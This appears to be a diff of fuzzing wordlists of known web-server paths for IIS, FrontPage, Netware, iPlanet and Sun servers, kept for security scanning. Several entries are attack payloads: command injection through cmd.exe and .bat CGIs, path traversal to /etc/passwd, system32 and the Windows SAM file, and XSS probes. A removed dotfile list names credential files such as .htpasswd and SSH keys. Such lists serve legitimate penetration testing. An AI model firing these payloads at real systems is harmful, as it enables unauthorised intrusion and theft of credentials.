discovery/PredictableRes/CGI_HTTP_POST_Windows.fuzz.txt

@@ -0,0 +1,6 @@
+_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
+_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
+_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
+admin/db.php
+_vti_bin/shtml.dll/_vti_rpc

discovery/PredictableRes/CGI_Microsoft.fuzz.txt

@@ -0,0 +1,79 @@
+# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot.
+/cart32.exe
+/get32.exe
+/visadmin.exe
+/foxweb.exe
+/webplus.exe?about
+/fpsrvadm.exe
+/MsmMask.exe
+/cmd.exe?/c+dir
+/cmd1.exe?/c+dir
+/post32.exe|dir%20c:\\
+/cgitest.exe
+/hpnst.exe?c=p+i=
+/Pbcgi.exe
+/testcgi.exe
+/webfind.exe?keywords=01234567890123456789
+/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
+/test-cgi.exe?<script>alert(document.cookie)</script>
+/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
+/mkilog.exe
+/mkplog.exe
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/MsmMask.exe?mask=/junk334
+/perl.exe?-v
+/perl.exe
+/ppdscgi.exe
+/c32web.exe/ChangeAdminPassword
+/windmail.exe
+/dbmlparser.exe
+/cgimail.exe
+/minimal.exe
+/rguest.exe
+/visitor.exe
+/webbbs.exe
+/wguest.exe
+//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
+/cfgwiz.exe
+/Cgitest.exe
+/mailform.exe
+/post16.exe
+/imagemap.exe
+/htimage.exe/path/filename?2,2
+/htimage.exe
+/Webnews.exe
+/texis.exe/junk
+/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
+/sensepost.exe?/c+dir
+/testcgi.exe
+/testcgi.exe?<script>alert(document.cookie)</script>
+/ion-p.exe?page=c:\winnt\repair\sam
+/../../../../../../../../../../WINNT/system32/ipconfig.exe
+/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
+/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
+/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
+/foxweb.dll
+/wconsole.dll
+/shtml.dll
+/scripts/slxweb.dll/getfile?type=Library&file=[invalid
+/filename]
+/rightfax/fuwww.dll/?
+/WINDMAIL.EXE?%20-n%20c:\boot.ini%
+/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
+/GW5/GWWEB.EXE
+/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
+/GW5/GWWEB.EXE?HELP=bad-request
+/GWWEB.EXE?HELP=bad-request
+/echo.bat
+/echo.bat?&dir+c:\\
+/hello.bat?&dir+c:\\
+/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+/input2.bat?|dir
+/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+/test-cgi.bat
+/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
+/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

discovery/PredictableRes/HTTP_POST_Microsoft.fuzz.txt

@@ -0,0 +1,2 @@
+# Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb
+/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName

discovery/PredictableRes/Netware.fuzz.txt

@@ -0,0 +1,60 @@
+/Aplicaciones
+/EHS.Web
+/Exchange
+/ICHAIN
+/ICHAINErrors
+/ICHAINLogout
+/ICS
+/ICSIBroker
+/ICSLogin
+/NSearch
+/NetStorage
+/Portal
+/SearchServlet
+/apache
+/aplicaciones
+/bo
+/eGuide
+/eMFrame
+/ed
+/edgecgi
+/edirectory
+/eg
+/eguide
+/eis
+/exteND
+/extend
+/fullpageservic
+/home.html
+/iFolder
+/iManager
+/ifolder
+/im
+/imanager
+/index.html
+/intranet
+/iprint
+/ndk
+/ned
+/nps
+/nsadmin
+/nsure
+/oneNet
+/pg
+/portal
+/portalservice
+/principal
+/quickfinder
+/r3d
+/service
+/servlet
+/site
+/sms
+/tomcat
+/update
+/vo
+/voffice
+/webacc
+/webgui
+/welcome
+/wgate

discovery/unix/interesting-files-dotfiles.fuzz.txt

@@ -1,51 +0,0 @@
-/.DS_Store
-/.FBCIndex
-/.access
-/.addressbook
-/.bash_history
-/.bashrc
-/.cobalt
-/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
-/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
-/.cobalt/sysManage/../admin/.htaccess
-/.fhp
-/.forward
-/.history
-/.htaccess
-/.htaccess.old
-/.htaccess.save
-/.htaccess~
-/.htpasswd
-/.lynx_cookies
-/.mysql_history
-/.nsconfig
-/.nsf/../winnt/win.ini
-/.passwd
-/.perf
-/.pinerc
-/.plan
-/.proclog
-/.procmailrc
-/.profile
-/.psql_history
-/.rhosts
-/.sh_history
-/.ssh
-/.ssh/authorized_keys
-/.ssh/known_hosts
-/.www_acl
-/.wwwacl
-/.access
-/.cobalt
-/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
-/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
-/.fhp
-/.htaccess
-/.htaccess.old
-/.htaccess.save
-/.htaccess~
-/.htpasswd
-/.nsconfig
-/.passwd
-/.www_acl
-/.wwwacl

discovery/unix/interesting-files-iplanet.fuzz.txt

@@ -1,36 +0,0 @@
-/?Publisher
-/?wp-cs-dump
-/?wp-html-rend
-/?wp-start-ver
-/?wp-stop-ver
-/?wp-uncheckout
-/?wp-usr-prop
-/?wp-ver-diff
-/?wp-ver-info
-/?wp-verify-link
-/admin-serv
-/admin-serv/config/admpw
-/admpw
-/agents
-/bin
-/ca
-/ca
-/cgi-bin
-/config
-/dirb_random.cgi
-/dirb_random.jsp
-/dirb_random.shtml
-/docs
-/dsgw
-/help
-/index.html
-/jsp
-/manual
-/mc-icons
-/netshare
-/ns-icons
-/publisher
-/search
-/search-ui
-/servlet
-/servlets

discovery/unix/interesting-files-sun-app-server.fuzz.txt

@@ -1,51 +0,0 @@
-/ias-samples
-/ias-samples/index.html
-/index.html
-/cgi-bin
-/cgi-bin/gx.cgi
-/cgi-bin/gx.dll
-/cgi-bin/gx.exe
-/gx
-/gx.cgi
-/gx.exe
-/GXApp
-/GXApp/index.html
-/GXApp/COnlineBank
-/GXApp/COnlineBank/COBLogin.html
-/GXApp/CSample
-/GXApp/CSample/index.html
-/GXApp/images
-/GXApp/OnlineBank
-/GXApp/OnlineBank/OBLogin.html
-/fortune
-/NASApp/fortune/fortune
-/lotery
-/COnlineBank
-/CSample
-/OnlineBank
-/NASApp
-/NASApp/system
-/NASApp/system/ValidationError.jsp
-/NASApp/system/ExceptionThrown.jsp
-/NASApp/system/JSPRunner
-/NASApp/system/JSPRunnerSticky
-/NASApp/system/SessionInvalidator
-/NASApp/system/StaticServlet
-/NASApp/system/WelcomeListServlet
-/NASApp/system/FormAuthServlet
-/NASApp/system/CertAuthServlet
-/NASApp/system/BasicAuthServlet
-/system
-/ValidationError.jsp
-/ExceptionThrown.jsp
-/JSPRunner
-/JSPRunnerSticky
-/SessionInvalidator
-/StaticServlet
-/WelcomeListServlet
-/FormAuthServlet
-/CertAuthServlet
-/BasicAuthServlet
-/com.netscape.server.servlet.jsp.JSPRunner
-/servlet
-/classes